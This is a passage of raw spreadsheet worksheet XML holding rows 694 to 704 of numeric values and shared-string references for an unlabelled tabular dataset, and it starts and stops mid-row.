        <v>0</v>
      </c>
      <c r="T694">
        <v>1</v>
      </c>
      <c r="U694">
        <v>0</v>
      </c>
      <c r="V694">
        <v>1000</v>
      </c>
      <c r="W694">
        <v>0</v>
      </c>
      <c r="X694">
        <v>0</v>
      </c>
      <c r="Y694">
        <v>0</v>
      </c>
      <c r="Z694">
        <v>0</v>
      </c>
      <c r="AA694">
        <v>0</v>
      </c>
      <c r="AB694">
        <v>1000</v>
      </c>
      <c r="AC694">
        <v>1000</v>
      </c>
      <c r="AD694">
        <v>0</v>
      </c>
      <c r="AE694">
        <v>3000</v>
      </c>
      <c r="AF694" t="s">
        <v>5456</v>
      </c>
      <c r="AG694">
        <v>23117</v>
      </c>
      <c r="AH694">
        <v>1</v>
      </c>
      <c r="AJ694">
        <v>19</v>
      </c>
      <c r="AK694" t="s">
        <v>5457</v>
      </c>
      <c r="AL694" t="s">
        <v>5458</v>
      </c>
      <c r="AM694" t="s">
        <v>3365</v>
      </c>
      <c r="AN694" t="s">
        <v>68</v>
      </c>
      <c r="AO694">
        <v>2019</v>
      </c>
      <c r="AP694" t="s">
        <v>5459</v>
      </c>
      <c r="AQ694" t="s">
        <v>5460</v>
      </c>
      <c r="AR694" t="s">
        <v>5456</v>
      </c>
      <c r="AS694" t="s">
        <v>57</v>
      </c>
      <c r="AT694" t="s">
        <v>58</v>
      </c>
      <c r="AU694">
        <v>25</v>
      </c>
      <c r="AV694">
        <v>1</v>
      </c>
      <c r="AW694">
        <v>3</v>
      </c>
      <c r="AX694">
        <v>5</v>
      </c>
      <c r="AY694">
        <v>6</v>
      </c>
      <c r="AZ694">
        <v>5</v>
      </c>
      <c r="BA694" t="s">
        <v>17226</v>
      </c>
      <c r="BB694">
        <v>0</v>
      </c>
      <c r="BC694">
        <v>0</v>
      </c>
      <c r="BD694" t="s">
        <v>10290</v>
      </c>
    </row>
    <row r="695" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A695">
        <v>2621</v>
      </c>
      <c r="B695" t="s">
        <v>5461</v>
      </c>
      <c r="C695" t="s">
        <v>157</v>
      </c>
      <c r="D695" t="s">
        <v>5462</v>
      </c>
      <c r="E695" t="s">
        <v>131</v>
      </c>
      <c r="F695" t="s">
        <v>5463</v>
      </c>
      <c r="G695" s="1">
        <v>43952</v>
      </c>
      <c r="H695">
        <v>1743</v>
      </c>
      <c r="I695">
        <v>1743</v>
      </c>
      <c r="J695">
        <v>0</v>
      </c>
      <c r="K695">
        <v>0</v>
      </c>
      <c r="L695">
        <v>0</v>
      </c>
      <c r="M695">
        <v>0</v>
      </c>
      <c r="N695">
        <v>0</v>
      </c>
      <c r="O695">
        <v>0</v>
      </c>
      <c r="P695">
        <v>0</v>
      </c>
      <c r="Q695">
        <v>6</v>
      </c>
      <c r="R695">
        <v>0</v>
      </c>
      <c r="S695">
        <v>0</v>
      </c>
      <c r="T695">
        <v>3</v>
      </c>
      <c r="U695">
        <v>0</v>
      </c>
      <c r="V695">
        <v>0</v>
      </c>
      <c r="W695">
        <v>0</v>
      </c>
      <c r="X695">
        <v>0</v>
      </c>
      <c r="Y695">
        <v>0</v>
      </c>
      <c r="Z695">
        <v>0</v>
      </c>
      <c r="AA695">
        <v>0</v>
      </c>
      <c r="AB695">
        <v>10000</v>
      </c>
      <c r="AC695">
        <v>0</v>
      </c>
      <c r="AD695">
        <v>0</v>
      </c>
      <c r="AE695">
        <v>20000</v>
      </c>
      <c r="AF695" t="s">
        <v>5464</v>
      </c>
      <c r="AG695">
        <v>65158</v>
      </c>
      <c r="AH695">
        <v>16</v>
      </c>
      <c r="AJ695">
        <v>234</v>
      </c>
      <c r="AK695" t="s">
        <v>5465</v>
      </c>
      <c r="AL695" t="s">
        <v>5466</v>
      </c>
      <c r="AM695" t="s">
        <v>5467</v>
      </c>
      <c r="AN695" t="s">
        <v>82</v>
      </c>
      <c r="AO695">
        <v>1999</v>
      </c>
      <c r="AP695" t="s">
        <v>5468</v>
      </c>
      <c r="AQ695" t="s">
        <v>5469</v>
      </c>
      <c r="AR695" t="s">
        <v>5470</v>
      </c>
      <c r="AS695" t="s">
        <v>71</v>
      </c>
      <c r="AT695" t="s">
        <v>86</v>
      </c>
      <c r="AU695">
        <v>24</v>
      </c>
      <c r="AV695">
        <v>3</v>
      </c>
      <c r="AW695">
        <v>83</v>
      </c>
      <c r="AX695">
        <v>64</v>
      </c>
      <c r="AY695">
        <v>33</v>
      </c>
      <c r="AZ695">
        <v>15</v>
      </c>
      <c r="BA695" t="s">
        <v>17218</v>
      </c>
      <c r="BB695">
        <v>0</v>
      </c>
      <c r="BC695" t="s">
        <v>10417</v>
      </c>
      <c r="BD695" t="s">
        <v>10414</v>
      </c>
    </row>
    <row r="696" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A696">
        <v>2641</v>
      </c>
      <c r="B696" t="s">
        <v>5471</v>
      </c>
      <c r="C696" t="s">
        <v>2160</v>
      </c>
      <c r="D696" t="s">
        <v>5472</v>
      </c>
      <c r="E696" t="s">
        <v>142</v>
      </c>
      <c r="F696" t="s">
        <v>1746</v>
      </c>
      <c r="G696" s="1">
        <v>44070</v>
      </c>
      <c r="H696">
        <v>1744</v>
      </c>
      <c r="I696">
        <v>1744</v>
      </c>
      <c r="J696">
        <v>1</v>
      </c>
      <c r="K696">
        <v>0</v>
      </c>
      <c r="L696">
        <v>0</v>
      </c>
      <c r="M696">
        <v>2</v>
      </c>
      <c r="N696">
        <v>0</v>
      </c>
      <c r="O696">
        <v>0</v>
      </c>
      <c r="P696">
        <v>0</v>
      </c>
      <c r="Q696">
        <v>3</v>
      </c>
      <c r="R696">
        <v>5</v>
      </c>
      <c r="S696">
        <v>0</v>
      </c>
      <c r="T696">
        <v>1</v>
      </c>
      <c r="U696">
        <v>20000</v>
      </c>
      <c r="V696">
        <v>0</v>
      </c>
      <c r="W696">
        <v>0</v>
      </c>
      <c r="X696">
        <v>3000</v>
      </c>
      <c r="Y696">
        <v>0</v>
      </c>
      <c r="Z696">
        <v>0</v>
      </c>
      <c r="AA696">
        <v>0</v>
      </c>
      <c r="AB696">
        <v>0</v>
      </c>
      <c r="AC696">
        <v>15000</v>
      </c>
      <c r="AD696">
        <v>0</v>
      </c>
      <c r="AE696">
        <v>20000</v>
      </c>
      <c r="AF696" t="s">
        <v>4413</v>
      </c>
      <c r="AG696">
        <v>74181</v>
      </c>
      <c r="AH696">
        <v>21</v>
      </c>
      <c r="AJ696">
        <v>329</v>
      </c>
      <c r="AK696" t="s">
        <v>2164</v>
      </c>
      <c r="AL696" t="s">
        <v>2165</v>
      </c>
      <c r="AM696" t="s">
        <v>5473</v>
      </c>
      <c r="AN696" t="s">
        <v>68</v>
      </c>
      <c r="AO696">
        <v>2014</v>
      </c>
      <c r="AP696">
        <v>5322067703</v>
      </c>
      <c r="AQ696" t="s">
        <v>5474</v>
      </c>
      <c r="AR696" t="s">
        <v>5475</v>
      </c>
      <c r="AS696" t="s">
        <v>179</v>
      </c>
      <c r="AT696" t="s">
        <v>72</v>
      </c>
      <c r="AU696">
        <v>26</v>
      </c>
      <c r="AV696">
        <v>1</v>
      </c>
      <c r="AW696">
        <v>7</v>
      </c>
      <c r="AX696">
        <v>13</v>
      </c>
      <c r="AY696">
        <v>9</v>
      </c>
      <c r="AZ696">
        <v>6</v>
      </c>
      <c r="BA696" t="s">
        <v>17234</v>
      </c>
      <c r="BB696" t="s">
        <v>15888</v>
      </c>
      <c r="BC696" t="s">
        <v>10312</v>
      </c>
      <c r="BD696" t="s">
        <v>10313</v>
      </c>
    </row>
    <row r="697" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A697">
        <v>2051</v>
      </c>
      <c r="B697" t="s">
        <v>5476</v>
      </c>
      <c r="C697" t="s">
        <v>157</v>
      </c>
      <c r="D697" t="s">
        <v>5477</v>
      </c>
      <c r="E697" t="s">
        <v>142</v>
      </c>
      <c r="F697" t="s">
        <v>5478</v>
      </c>
      <c r="G697" s="1">
        <v>43871</v>
      </c>
      <c r="H697">
        <v>1770</v>
      </c>
      <c r="I697">
        <v>1770</v>
      </c>
      <c r="J697">
        <v>3</v>
      </c>
      <c r="K697">
        <v>0</v>
      </c>
      <c r="L697">
        <v>0</v>
      </c>
      <c r="M697">
        <v>0</v>
      </c>
      <c r="N697">
        <v>0</v>
      </c>
      <c r="O697">
        <v>0</v>
      </c>
      <c r="P697">
        <v>0</v>
      </c>
      <c r="Q697">
        <v>0</v>
      </c>
      <c r="R697">
        <v>0</v>
      </c>
      <c r="S697">
        <v>0</v>
      </c>
      <c r="T697">
        <v>0</v>
      </c>
      <c r="U697">
        <v>750000</v>
      </c>
      <c r="V697">
        <v>0</v>
      </c>
      <c r="W697">
        <v>0</v>
      </c>
      <c r="X697">
        <v>0</v>
      </c>
      <c r="Y697">
        <v>0</v>
      </c>
      <c r="Z697">
        <v>0</v>
      </c>
      <c r="AA697">
        <v>0</v>
      </c>
      <c r="AB697">
        <v>0</v>
      </c>
      <c r="AC697">
        <v>0</v>
      </c>
      <c r="AD697">
        <v>0</v>
      </c>
      <c r="AE697">
        <v>0</v>
      </c>
      <c r="AF697" t="s">
        <v>5479</v>
      </c>
      <c r="AG697">
        <v>61254</v>
      </c>
      <c r="AH697">
        <v>16</v>
      </c>
      <c r="AJ697">
        <v>242</v>
      </c>
      <c r="AK697" t="s">
        <v>1894</v>
      </c>
      <c r="AL697" t="s">
        <v>5480</v>
      </c>
      <c r="AM697" t="s">
        <v>5481</v>
      </c>
      <c r="AN697" t="s">
        <v>55</v>
      </c>
      <c r="AO697">
        <v>2010</v>
      </c>
      <c r="AP697" t="s">
        <v>5482</v>
      </c>
      <c r="AQ697" t="s">
        <v>5483</v>
      </c>
      <c r="AR697" t="s">
        <v>5484</v>
      </c>
      <c r="AU697">
        <v>26</v>
      </c>
      <c r="AV697">
        <v>1</v>
      </c>
      <c r="AW697">
        <v>10</v>
      </c>
      <c r="AX697">
        <v>0</v>
      </c>
      <c r="AY697">
        <v>8</v>
      </c>
      <c r="AZ697">
        <v>2</v>
      </c>
      <c r="BA697" t="s">
        <v>17048</v>
      </c>
      <c r="BB697" t="s">
        <v>15669</v>
      </c>
      <c r="BC697" t="s">
        <v>9799</v>
      </c>
      <c r="BD697" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="698" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A698">
        <v>2252</v>
      </c>
      <c r="B698" t="s">
        <v>5485</v>
      </c>
      <c r="C698" t="s">
        <v>458</v>
      </c>
      <c r="D698" t="s">
        <v>5486</v>
      </c>
      <c r="E698" t="s">
        <v>2184</v>
      </c>
      <c r="F698" t="s">
        <v>5487</v>
      </c>
      <c r="G698" s="1">
        <v>43871</v>
      </c>
      <c r="H698">
        <v>1789</v>
      </c>
      <c r="I698">
        <v>1789</v>
      </c>
      <c r="J698">
        <v>0</v>
      </c>
      <c r="K698">
        <v>0</v>
      </c>
      <c r="L698">
        <v>0</v>
      </c>
      <c r="M698">
        <v>0</v>
      </c>
      <c r="N698">
        <v>0</v>
      </c>
      <c r="O698">
        <v>0</v>
      </c>
      <c r="P698">
        <v>0</v>
      </c>
      <c r="Q698">
        <v>3</v>
      </c>
      <c r="R698">
        <v>5</v>
      </c>
      <c r="S698">
        <v>0</v>
      </c>
      <c r="T698">
        <v>1</v>
      </c>
      <c r="U698">
        <v>0</v>
      </c>
      <c r="V698">
        <v>0</v>
      </c>
      <c r="W698">
        <v>0</v>
      </c>
      <c r="X698">
        <v>0</v>
      </c>
      <c r="Y698">
        <v>0</v>
      </c>
      <c r="Z698">
        <v>0</v>
      </c>
      <c r="AA698">
        <v>0</v>
      </c>
      <c r="AB698">
        <v>800</v>
      </c>
      <c r="AC698">
        <v>800</v>
      </c>
      <c r="AD698">
        <v>0</v>
      </c>
      <c r="AE698">
        <v>2000</v>
      </c>
      <c r="AF698" t="s">
        <v>5488</v>
      </c>
      <c r="AG698">
        <v>29125</v>
      </c>
      <c r="AH698">
        <v>5</v>
      </c>
      <c r="AJ698">
        <v>154</v>
      </c>
      <c r="AK698" t="s">
        <v>5489</v>
      </c>
      <c r="AL698" t="s">
        <v>5489</v>
      </c>
      <c r="AM698" t="s">
        <v>5490</v>
      </c>
      <c r="AN698" t="s">
        <v>55</v>
      </c>
      <c r="AO698">
        <v>2019</v>
      </c>
      <c r="AP698">
        <v>81270336066</v>
      </c>
      <c r="AQ698" t="s">
        <v>5491</v>
      </c>
      <c r="AR698" t="s">
        <v>5488</v>
      </c>
      <c r="AS698" t="s">
        <v>71</v>
      </c>
      <c r="AT698" t="s">
        <v>58</v>
      </c>
      <c r="AU698">
        <v>24</v>
      </c>
      <c r="AV698">
        <v>1</v>
      </c>
      <c r="AW698">
        <v>2</v>
      </c>
      <c r="AX698">
        <v>4</v>
      </c>
      <c r="AY698">
        <v>2</v>
      </c>
      <c r="AZ698">
        <v>1</v>
      </c>
      <c r="BA698" t="s">
        <v>17104</v>
      </c>
      <c r="BB698" t="s">
        <v>15791</v>
      </c>
      <c r="BC698" t="s">
        <v>9638</v>
      </c>
      <c r="BD698" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="699" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A699">
        <v>2134</v>
      </c>
      <c r="B699" t="s">
        <v>5492</v>
      </c>
      <c r="C699" t="s">
        <v>318</v>
      </c>
      <c r="D699" t="s">
        <v>5493</v>
      </c>
      <c r="E699" t="s">
        <v>843</v>
      </c>
      <c r="F699" t="s">
        <v>5256</v>
      </c>
      <c r="G699" s="1">
        <v>43882</v>
      </c>
      <c r="H699">
        <v>1801</v>
      </c>
      <c r="I699">
        <v>1801</v>
      </c>
      <c r="J699">
        <v>0</v>
      </c>
      <c r="K699">
        <v>0</v>
      </c>
      <c r="L699">
        <v>0</v>
      </c>
      <c r="M699">
        <v>0</v>
      </c>
      <c r="N699">
        <v>0</v>
      </c>
      <c r="O699">
        <v>0</v>
      </c>
      <c r="P699">
        <v>0</v>
      </c>
      <c r="Q699">
        <v>2</v>
      </c>
      <c r="R699">
        <v>6</v>
      </c>
      <c r="S699">
        <v>0</v>
      </c>
      <c r="T699">
        <v>0</v>
      </c>
      <c r="U699">
        <v>0</v>
      </c>
      <c r="V699">
        <v>0</v>
      </c>
      <c r="W699">
        <v>0</v>
      </c>
      <c r="X699">
        <v>0</v>
      </c>
      <c r="Y699">
        <v>0</v>
      </c>
      <c r="Z699">
        <v>0</v>
      </c>
      <c r="AA699">
        <v>0</v>
      </c>
      <c r="AB699">
        <v>30</v>
      </c>
      <c r="AC699">
        <v>360</v>
      </c>
      <c r="AD699">
        <v>0</v>
      </c>
      <c r="AE699">
        <v>0</v>
      </c>
      <c r="AF699" t="s">
        <v>5494</v>
      </c>
      <c r="AG699">
        <v>90516</v>
      </c>
      <c r="AH699">
        <v>26</v>
      </c>
      <c r="AJ699">
        <v>406</v>
      </c>
      <c r="AK699" t="s">
        <v>322</v>
      </c>
      <c r="AL699" t="s">
        <v>5495</v>
      </c>
      <c r="AM699" t="s">
        <v>5496</v>
      </c>
      <c r="AN699" t="s">
        <v>68</v>
      </c>
      <c r="AO699">
        <v>2007</v>
      </c>
      <c r="AP699">
        <v>81355240999</v>
      </c>
      <c r="AQ699" t="s">
        <v>5497</v>
      </c>
      <c r="AR699" t="s">
        <v>5494</v>
      </c>
      <c r="AS699" t="s">
        <v>71</v>
      </c>
      <c r="AT699" t="s">
        <v>58</v>
      </c>
      <c r="AU699">
        <v>20</v>
      </c>
      <c r="AV699">
        <v>2</v>
      </c>
      <c r="AW699">
        <v>0</v>
      </c>
      <c r="AX699">
        <v>0</v>
      </c>
      <c r="AY699">
        <v>9</v>
      </c>
      <c r="AZ699">
        <v>3</v>
      </c>
      <c r="BA699" t="s">
        <v>17077</v>
      </c>
      <c r="BB699" t="s">
        <v>15722</v>
      </c>
      <c r="BC699" t="s">
        <v>10323</v>
      </c>
      <c r="BD699" t="s">
        <v>10324</v>
      </c>
    </row>
    <row r="700" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A700">
        <v>2249</v>
      </c>
      <c r="B700" t="s">
        <v>5498</v>
      </c>
      <c r="C700" t="s">
        <v>157</v>
      </c>
      <c r="D700" t="s">
        <v>5499</v>
      </c>
      <c r="E700" t="s">
        <v>363</v>
      </c>
      <c r="F700" t="s">
        <v>5500</v>
      </c>
      <c r="G700" s="1">
        <v>43930</v>
      </c>
      <c r="H700">
        <v>1809</v>
      </c>
      <c r="I700">
        <v>1809</v>
      </c>
      <c r="J700">
        <v>1</v>
      </c>
      <c r="K700">
        <v>0</v>
      </c>
      <c r="L700">
        <v>0</v>
      </c>
      <c r="M700">
        <v>0</v>
      </c>
      <c r="N700">
        <v>0</v>
      </c>
      <c r="O700">
        <v>0</v>
      </c>
      <c r="P700">
        <v>0</v>
      </c>
      <c r="Q700">
        <v>0</v>
      </c>
      <c r="R700">
        <v>0</v>
      </c>
      <c r="S700">
        <v>0</v>
      </c>
      <c r="T700">
        <v>1</v>
      </c>
      <c r="U700">
        <v>3000</v>
      </c>
      <c r="V700">
        <v>0</v>
      </c>
      <c r="W700">
        <v>0</v>
      </c>
      <c r="X700">
        <v>0</v>
      </c>
      <c r="Y700">
        <v>0</v>
      </c>
      <c r="Z700">
        <v>0</v>
      </c>
      <c r="AA700">
        <v>0</v>
      </c>
      <c r="AB700">
        <v>0</v>
      </c>
      <c r="AC700">
        <v>0</v>
      </c>
      <c r="AD700">
        <v>0</v>
      </c>
      <c r="AE700">
        <v>3000</v>
      </c>
      <c r="AF700" t="s">
        <v>5501</v>
      </c>
      <c r="AG700">
        <v>60155</v>
      </c>
      <c r="AH700">
        <v>16</v>
      </c>
      <c r="AJ700">
        <v>264</v>
      </c>
      <c r="AK700" t="s">
        <v>3130</v>
      </c>
      <c r="AL700" t="s">
        <v>5502</v>
      </c>
      <c r="AM700" t="s">
        <v>5503</v>
      </c>
      <c r="AN700" t="s">
        <v>55</v>
      </c>
      <c r="AO700">
        <v>2017</v>
      </c>
      <c r="AP700">
        <v>8123174454</v>
      </c>
      <c r="AQ700" t="s">
        <v>5504</v>
      </c>
      <c r="AR700" t="s">
        <v>5501</v>
      </c>
      <c r="AS700" t="s">
        <v>71</v>
      </c>
      <c r="AT700" t="s">
        <v>58</v>
      </c>
      <c r="AU700">
        <v>25</v>
      </c>
      <c r="AV700">
        <v>1</v>
      </c>
      <c r="AW700">
        <v>6</v>
      </c>
      <c r="AX700">
        <v>3</v>
      </c>
      <c r="AY700">
        <v>4</v>
      </c>
      <c r="AZ700">
        <v>1</v>
      </c>
      <c r="BA700" t="s">
        <v>17102</v>
      </c>
      <c r="BB700" t="s">
        <v>15788</v>
      </c>
      <c r="BC700">
        <v>0</v>
      </c>
      <c r="BD700" t="s">
        <v>10328</v>
      </c>
    </row>
    <row r="701" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A701">
        <v>2611</v>
      </c>
      <c r="B701" t="s">
        <v>5505</v>
      </c>
      <c r="C701" t="s">
        <v>5506</v>
      </c>
      <c r="D701" t="s">
        <v>5507</v>
      </c>
      <c r="E701" t="s">
        <v>111</v>
      </c>
      <c r="F701" t="s">
        <v>5508</v>
      </c>
      <c r="G701" s="1">
        <v>43881</v>
      </c>
      <c r="H701">
        <v>1839</v>
      </c>
      <c r="I701">
        <v>1839</v>
      </c>
      <c r="J701">
        <v>2</v>
      </c>
      <c r="K701">
        <v>2</v>
      </c>
      <c r="L701">
        <v>2</v>
      </c>
      <c r="M701">
        <v>0</v>
      </c>
      <c r="N701">
        <v>0</v>
      </c>
      <c r="O701">
        <v>0</v>
      </c>
      <c r="P701">
        <v>0</v>
      </c>
      <c r="Q701">
        <v>4</v>
      </c>
      <c r="R701">
        <v>20</v>
      </c>
      <c r="S701">
        <v>0</v>
      </c>
      <c r="T701">
        <v>1</v>
      </c>
      <c r="U701">
        <v>100000</v>
      </c>
      <c r="V701">
        <v>10000</v>
      </c>
      <c r="W701">
        <v>10000</v>
      </c>
      <c r="X701">
        <v>0</v>
      </c>
      <c r="Y701">
        <v>0</v>
      </c>
      <c r="Z701">
        <v>0</v>
      </c>
      <c r="AA701">
        <v>0</v>
      </c>
      <c r="AB701">
        <v>200</v>
      </c>
      <c r="AC701">
        <v>100</v>
      </c>
      <c r="AD701">
        <v>0</v>
      </c>
      <c r="AE701">
        <v>5000</v>
      </c>
      <c r="AF701" t="s">
        <v>5509</v>
      </c>
      <c r="AG701">
        <v>85231</v>
      </c>
      <c r="AH701">
        <v>19</v>
      </c>
      <c r="AJ701">
        <v>314</v>
      </c>
      <c r="AK701" t="s">
        <v>5510</v>
      </c>
      <c r="AL701" t="s">
        <v>5510</v>
      </c>
      <c r="AM701" t="s">
        <v>5511</v>
      </c>
      <c r="AN701" t="s">
        <v>55</v>
      </c>
      <c r="AO701">
        <v>2015</v>
      </c>
      <c r="AP701">
        <v>81340296778</v>
      </c>
      <c r="AQ701" t="s">
        <v>5512</v>
      </c>
      <c r="AR701" t="s">
        <v>5513</v>
      </c>
      <c r="AS701" t="s">
        <v>71</v>
      </c>
      <c r="AT701" t="s">
        <v>58</v>
      </c>
      <c r="AU701">
        <v>25</v>
      </c>
      <c r="AV701">
        <v>1</v>
      </c>
      <c r="AW701">
        <v>20</v>
      </c>
      <c r="AX701">
        <v>5</v>
      </c>
      <c r="AY701">
        <v>3</v>
      </c>
      <c r="AZ701">
        <v>4</v>
      </c>
      <c r="BA701" t="s">
        <v>17207</v>
      </c>
      <c r="BB701">
        <v>0</v>
      </c>
      <c r="BC701" t="s">
        <v>10337</v>
      </c>
      <c r="BD701" t="s">
        <v>10335</v>
      </c>
    </row>
    <row r="702" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A702">
        <v>2604</v>
      </c>
      <c r="B702" t="s">
        <v>5514</v>
      </c>
      <c r="C702" t="s">
        <v>99</v>
      </c>
      <c r="D702" t="s">
        <v>5515</v>
      </c>
      <c r="E702" t="s">
        <v>142</v>
      </c>
      <c r="F702" t="s">
        <v>5516</v>
      </c>
      <c r="G702" s="1">
        <v>44119</v>
      </c>
      <c r="H702">
        <v>1846</v>
      </c>
      <c r="I702">
        <v>1846</v>
      </c>
      <c r="J702">
        <v>1</v>
      </c>
      <c r="K702">
        <v>0</v>
      </c>
      <c r="L702">
        <v>1</v>
      </c>
      <c r="M702">
        <v>1</v>
      </c>
      <c r="N702">
        <v>0</v>
      </c>
      <c r="O702">
        <v>0</v>
      </c>
      <c r="P702">
        <v>0</v>
      </c>
      <c r="Q702">
        <v>0</v>
      </c>
      <c r="R702">
        <v>15</v>
      </c>
      <c r="S702">
        <v>1</v>
      </c>
      <c r="T702">
        <v>1</v>
      </c>
      <c r="U702">
        <v>100000</v>
      </c>
      <c r="V702">
        <v>0</v>
      </c>
      <c r="W702">
        <v>4000</v>
      </c>
      <c r="X702">
        <v>2000</v>
      </c>
      <c r="Y702">
        <v>0</v>
      </c>
      <c r="Z702">
        <v>0</v>
      </c>
      <c r="AA702">
        <v>0</v>
      </c>
      <c r="AB702">
        <v>0</v>
      </c>
      <c r="AC702">
        <v>3000</v>
      </c>
      <c r="AD702">
        <v>1</v>
      </c>
      <c r="AE702">
        <v>2000</v>
      </c>
      <c r="AF702" t="s">
        <v>5517</v>
      </c>
      <c r="AG702">
        <v>14450</v>
      </c>
      <c r="AH702">
        <v>12</v>
      </c>
      <c r="AJ702">
        <v>160</v>
      </c>
      <c r="AK702" t="s">
        <v>114</v>
      </c>
      <c r="AL702" t="s">
        <v>115</v>
      </c>
      <c r="AM702" t="s">
        <v>5518</v>
      </c>
      <c r="AN702" t="s">
        <v>55</v>
      </c>
      <c r="AO702">
        <v>2018</v>
      </c>
      <c r="AP702">
        <v>2122665544</v>
      </c>
      <c r="AQ702" t="s">
        <v>5519</v>
      </c>
      <c r="AR702" t="s">
        <v>5520</v>
      </c>
      <c r="AS702" t="s">
        <v>71</v>
      </c>
      <c r="AT702" t="s">
        <v>58</v>
      </c>
      <c r="AU702">
        <v>25</v>
      </c>
      <c r="AV702">
        <v>0</v>
      </c>
      <c r="AW702">
        <v>3</v>
      </c>
      <c r="AX702">
        <v>10</v>
      </c>
      <c r="AY702">
        <v>12</v>
      </c>
      <c r="AZ702">
        <v>5</v>
      </c>
      <c r="BA702" t="s">
        <v>17204</v>
      </c>
      <c r="BB702">
        <v>0</v>
      </c>
      <c r="BC702">
        <v>0</v>
      </c>
      <c r="BD702" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="703" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A703">
        <v>2191</v>
      </c>
      <c r="B703" t="s">
        <v>5521</v>
      </c>
      <c r="C703" t="s">
        <v>458</v>
      </c>
      <c r="D703" t="s">
        <v>5522</v>
      </c>
      <c r="E703" t="s">
        <v>843</v>
      </c>
      <c r="F703" t="s">
        <v>5523</v>
      </c>
      <c r="G703" s="1">
        <v>43871</v>
      </c>
      <c r="H703">
        <v>1847</v>
      </c>
      <c r="I703">
        <v>1847</v>
      </c>
      <c r="J703">
        <v>0</v>
      </c>
      <c r="K703">
        <v>1</v>
      </c>
      <c r="L703">
        <v>0</v>
      </c>
      <c r="M703">
        <v>0</v>
      </c>
      <c r="N703">
        <v>0</v>
      </c>
      <c r="O703">
        <v>0</v>
      </c>
      <c r="P703">
        <v>0</v>
      </c>
      <c r="Q703">
        <v>10</v>
      </c>
      <c r="R703">
        <v>20</v>
      </c>
      <c r="S703">
        <v>0</v>
      </c>
      <c r="T703">
        <v>1</v>
      </c>
      <c r="U703">
        <v>0</v>
      </c>
      <c r="V703">
        <v>500</v>
      </c>
      <c r="W703">
        <v>0</v>
      </c>
      <c r="X703">
        <v>0</v>
      </c>
      <c r="Y703">
        <v>0</v>
      </c>
      <c r="Z703">
        <v>0</v>
      </c>
      <c r="AA703">
        <v>0</v>
      </c>
      <c r="AB703">
        <v>200</v>
      </c>
      <c r="AC703">
        <v>200</v>
      </c>
      <c r="AD703">
        <v>0</v>
      </c>
      <c r="AE703">
        <v>2000</v>
      </c>
      <c r="AF703" t="s">
        <v>5524</v>
      </c>
      <c r="AG703">
        <v>29111</v>
      </c>
      <c r="AH703">
        <v>5</v>
      </c>
      <c r="AJ703">
        <v>154</v>
      </c>
      <c r="AK703" t="s">
        <v>3358</v>
      </c>
      <c r="AL703" t="s">
        <v>3358</v>
      </c>
      <c r="AM703" t="s">
        <v>5525</v>
      </c>
      <c r="AN703" t="s">
        <v>68</v>
      </c>
      <c r="AO703">
        <v>2018</v>
      </c>
      <c r="AP703" t="s">
        <v>5526</v>
      </c>
      <c r="AQ703" t="s">
        <v>5526</v>
      </c>
      <c r="AR703" t="s">
        <v>5524</v>
      </c>
      <c r="AS703" t="s">
        <v>71</v>
      </c>
      <c r="AT703" t="s">
        <v>58</v>
      </c>
      <c r="AU703">
        <v>20</v>
      </c>
      <c r="AV703">
        <v>1</v>
      </c>
      <c r="AW703">
        <v>1</v>
      </c>
      <c r="AX703">
        <v>0</v>
      </c>
      <c r="AY703">
        <v>2</v>
      </c>
      <c r="AZ703">
        <v>0</v>
      </c>
      <c r="BA703" t="s">
        <v>17082</v>
      </c>
      <c r="BB703" t="s">
        <v>15754</v>
      </c>
      <c r="BC703" t="s">
        <v>9638</v>
      </c>
      <c r="BD703" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="704" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A704">
        <v>2615</v>
      </c>
      <c r="B704" t="s">
        <v>5527</v>
      </c>
      <c r="C704" t="s">
        <v>2760</v>
      </c>
      <c r="D704" t="s">
        <v>5528</v>
      </c>
      <c r="E704" t="s">
        <v>984</v>
      </c>
      <c r="F704" t="s">
        <v>5529</v>
      </c>
      <c r="G704" s="1">
        <v>44006</v>
      </c>
      <c r="H704">
        <v>1915</v>
      </c>
      <c r="I704">
        <v>1915</v>
      </c>
      <c r="J704">
        <v>0</v>
      </c>
      <c r="K704">
        <v>1</v>
      </c>
      <c r="L704">
        <v>1</v>
      </c>
      <c r="M704">
        <v>0</v>
      </c>
      <c r="N704">
        <v>0</v>
      </c>
      <c r="O704">
        <v>0</v>
      </c>
      <c r="P704">
        <v>0</v>
      </c>
      <c r="Q704">
        <v>0</v>
      </c>
      <c r="R704">
        <v>1</v>
      </c>
      <c r="S704">
        <v>0</v>
      </c>
      <c r="T704">
        <v>1</v>
      </c>
      <c r="U704">
        <v>0</v>
      </c>
      <c r="V704">
        <v>40000</v>
      </c>
      <c r="W704">
        <v>3000</v>
      </c>
      <c r="X704">
        <v>0</v>
      </c>
      <c r="Y704">
        <v>0</v>
      </c>
      <c r="Z704">
        <v>0</v>
      </c>
      <c r="AA704">
        <v>0</v>
      </c>
      <c r="AB704">
        <v>0</v>
      </c>
      <c r="AC704">
        <v>2000</v>
      </c>
      <c r="AD704">
        <v>0</v>
      </c>
      <c r="AE704">
        <v>3000</v>
      </c>
      <c r="AF704" t="s">
        <v>5530</v>
      </c>
      <c r="AG704">
        <v>83581</v>
      </c>
      <c r="AH704">
        <v>18</v>
      </c>
      <c r="AJ704">
        <v>284</v>
      </c>
      <c r="AK704" t="s">
        <v>5531</v>
      </c>
      <c r="AL704" t="s">
        <v>5532</v>
      </c>
      <c r="AM704" t="s">
        <v>5533</v>
      </c>
      <c r="AN704" t="s">
        <v>55</v>
      </c>
      <c r="AO704">
        <v>2019</v>
      </c>
      <c r="AP704">
        <v>82231239300</v>
      </c>
      <c r="AQ704" t="s">
        <v>5534</v>
      </c>
      <c r="AR704" t="s">
        <v>5535</v>
      </c>
      <c r="AS704" t="s">
        <v>71</v>
      </c>
      <c r="AT704" t="s">
        <v>58</v>
      </c>
      <c r="AU704">
        <v>30</v>
      </c>
      <c r="AV704">
